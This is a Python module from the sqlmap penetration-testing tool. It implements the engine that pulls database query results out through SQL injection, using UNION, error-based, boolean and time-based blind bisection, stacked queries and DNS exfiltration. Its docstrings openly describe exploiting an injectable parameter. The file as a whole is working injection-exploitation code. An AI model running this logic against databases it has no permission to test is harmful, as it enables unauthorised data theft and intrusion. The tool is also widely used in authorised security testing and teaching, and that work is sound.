#!/usr/bin/env python """ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ import re import time from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import cleanQuery from lib.core.common import expandAsteriskForColumns from lib.core.common import extractExpectedValue from lib.core.common import getPublicTypeMembers from lib.core.common import getTechniqueData from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import initTechnique from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parseUnionPage from lib.core.common import popValue from lib.core.common import pushValue from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS from lib.core.settings import INFERENCE_MARKER from lib.core.settings import MAX_TECHNIQUES_PER_VALUE from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import UNICODE_ENCODING from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.direct import direct from lib.techniques.blind.inference import bisection from lib.techniques.blind.inference import queryOutputLength from lib.techniques.dns.test import dnsTest from lib.techniques.dns.use import dnsUse from lib.techniques.error.use import errorUse from lib.techniques.union.use import unionUse def _goDns(payload, expression): value = None if conf.dnsDomain and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: if kb.dnsTest is None: dnsTest(payload) if kb.dnsTest: value = dnsUse(payload, expression) return value def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None): start = time.time() value = None count = 0 value = _goDns(payload, expression) if payload is None: return None if value is not None: return value timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) if not (timeBasedCompare and kb.dnsTest): if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search(r"(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads): if field and re.search(r"\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): expression = "SELECT %s FROM (%s)" % (field, expression) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): expression += " AS %s" % randomStr(lowercase=True, seed=hash(expression)) if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','): nulledCastedField = agent.nullAndCastField(field) injExpression = expression.replace(field, nulledCastedField, 1) else: injExpression = expression length = queryOutputLength(injExpression, payload) else: length = None kb.inferenceMode = True count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump) kb.inferenceMode = False if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) logger.debug(debugMsg) return value def _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False): outputs = [] origExpr = None for field in expressionFieldsList: output = None if field.startswith("ROWNUM "): continue if isinstance(num, int): origExpr = expression expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) if "ROWNUM" in expressionFieldsList: expressionReplaced = expression else: expressionReplaced = expression.replace(expressionFields, field, 1) output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field) if isinstance(num, int): expression = origExpr outputs.append(output) return outputs def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Retrieve the output of a SQL query characted by character taking advantage of an blind SQL injection vulnerability on the affected parameter through a bisection algorithm. """ initTechnique(kb.technique) query = agent.prefixQuery(kb.injection.data[kb.technique].vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) count = None startLimit = 0 stopLimit = None outputs = BigArray() if not unpack: return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): expressionFieldsList = [expressionFields] if len(expressionFieldsList) > 1: infoMsg = "the SQL query provided has more than one field. " infoMsg += "sqlmap will now unpack it into distinct queries " infoMsg += "to be able to retrieve the output even if we " infoMsg += "are going blind" logger.info(infoMsg) # If we have been here from SQL query/shell we have to check if # the SQL query might return multiple entries and in such case # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: test = True if not stopLimit or stopLimit <= 1: if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): test = False if test: # Count the number of SQL query entries output countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] if not stopLimit: count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) if isNumPosStrValue(count): count = int(count) if batch or count == 1: stopLimit = count else: message = "the SQL query provided can return " message += "%d entries. How many " % count message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" choice = readInput(message, default='A').upper() if choice == 'A': stopLimit = count elif choice == 'Q': raise SqlmapUserQuitException elif choice.isdigit() and int(choice) > 0 and int(choice) <= count: stopLimit = int(choice) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) elif choice in ('#', 'S'): message = "how many? " stopLimit = readInput(message, default="10") if not stopLimit.isdigit(): errMsg = "invalid choice" logger.error(errMsg) return None else: stopLimit = int(stopLimit) else: errMsg = "invalid choice" logger.error(errMsg) return None elif count and not count.isdigit(): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) return None elif (not stopLimit or stopLimit == 0): return None try: try: for num in xrange(startLimit, stopLimit): output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) outputs.append(output) except OverflowError: errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) errMsg += "with switch '--fresh-queries'" raise SqlmapDataException(errMsg) except KeyboardInterrupt: print warnMsg = "user aborted during dumping phase" logger.warn(warnMsg) return outputs elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper(): expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None def _goBooleanProxy(expression): """ Retrieve the output of a boolean based SQL query """ initTechnique(kb.technique) if conf.dnsDomain: query = agent.prefixQuery(kb.injection.data[kb.technique].vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) output = _goDns(payload, expression) if output is not None: return output vector = kb.injection.data[kb.technique].vector vector = vector.replace(INFERENCE_MARKER, expression) query = agent.prefixQuery(vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) output = hashDBRetrieve(expression, checkConf=True) if output is None: output = Request.queryPage(payload, timeBasedCompare=timeBasedCompare, raise404=False) if output is not None: hashDBWrite(expression, output) return output def _goUnion(expression, unpack=True, dump=False): """ Retrieve the output of a SQL query taking advantage of an union SQL injection vulnerability on the affected parameter. """ output = unionUse(expression, unpack=unpack, dump=dump) if isinstance(output, basestring): output = parseUnionPage(output) return output @stackedmethod def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): """ Called each time sqlmap inject a SQL query on the SQL injection affected parameter. """ if conf.hexConvert: charsetType = CHARSET_TYPE.HEXADECIMAL kb.safeCharEncode = safeCharEncode kb.resumeValues = resumeValue for keyword in GET_VALUE_UPPERCASE_KEYWORDS: expression = re.sub(r"(?i)(\A|\(|\)|\s)%s(\Z|\(|\)|\s)" % keyword, r"\g<1>%s\g<2>" % keyword, expression) if suppressOutput is not None: pushValue(getCurrentThreadData().disableStdOut) getCurrentThreadData().disableStdOut = suppressOutput try: pushValue(conf.db) pushValue(conf.tbl) if expected == EXPECTED.BOOL: forgeCaseExpression = booleanExpression = expression if expression.startswith("SELECT "): booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1") else: forgeCaseExpression = agent.forgeCaseStatement(expression) if conf.direct: value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) elif any(isTechniqueAvailable(_) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True)): query = cleanQuery(expression) query = expandAsteriskForColumns(query) value = None found = False count = 0 if query and not re.search(r"COUNT.*FROM.*\(.*DISTINCT", query, re.I): query = query.replace("DISTINCT ", "") if not conf.forceDns: if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): kb.technique = PAYLOAD.TECHNIQUE.UNION kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8] fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion try: value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) except SqlmapConnectionException: if not fallback: raise count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if not found and fallback: warnMsg = "something went wrong with full UNION " warnMsg += "technique (could be because of " warnMsg += "limitation on retrieved number of entries)" if " FROM " in query.upper(): warnMsg += ". Falling back to partial UNION technique" singleTimeWarnMessage(warnMsg) try: pushValue(kb.forcePartialUnion) kb.forcePartialUnion = True value = _goUnion(query, unpack, dump) found = (value is not None) or (value is None and expectingNone) finally: kb.forcePartialUnion = popValue() else: singleTimeWarnMessage(warnMsg) if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found: kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if found and conf.dnsDomain: _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {'E': PAYLOAD.TECHNIQUE.ERROR, 'Q': PAYLOAD.TECHNIQUE.QUERY, 'U': PAYLOAD.TECHNIQUE.UNION}.items()))) warnMsg = "option '--dns-domain' will be ignored " warnMsg += "as faster techniques are usable " warnMsg += "(%s) " % _ singleTimeWarnMessage(warnMsg) if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found: kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression) kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): kb.technique = PAYLOAD.TECHNIQUE.TIME else: kb.technique = PAYLOAD.TECHNIQUE.STACKED if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) else: errMsg = "none of the injection types identified can be " errMsg += "leveraged to retrieve queries output" raise SqlmapNotVulnerableException(errMsg) finally: kb.resumeValues = True kb.responseTimeMode = None conf.tbl = popValue() conf.db = popValue() if suppressOutput is not None: getCurrentThreadData().disableStdOut = popValue() kb.safeCharEncode = False if not any((kb.testMode, conf.dummy, conf.offline)) and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert: warnMsg = "in case of continuous data retrieval problems you are advised to try " warnMsg += "a switch '--no-cast' " warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else "" singleTimeWarnMessage(warnMsg) # Dirty patch (safe-encoded unicode characters) if isinstance(value, unicode) and "\\x" in value: try: candidate = eval(repr(value).replace("\\\\x", "\\x").replace("u'", "'", 1)).decode(conf.encoding or UNICODE_ENCODING) if "\\x" not in candidate: value = candidate except: pass return extractExpectedValue(value, expected) def goStacked(expression, silent=False): if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: kb.technique = PAYLOAD.TECHNIQUE.STACKED else: for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): _ = getTechniqueData(technique) if _ and "stacked" in _["title"].lower(): kb.technique = technique break expression = cleanQuery(expression) if conf.direct: return direct(expression) query = agent.prefixQuery(";%s" % expression) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper()) def checkBooleanExpression(expression, expectingNone=True): return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)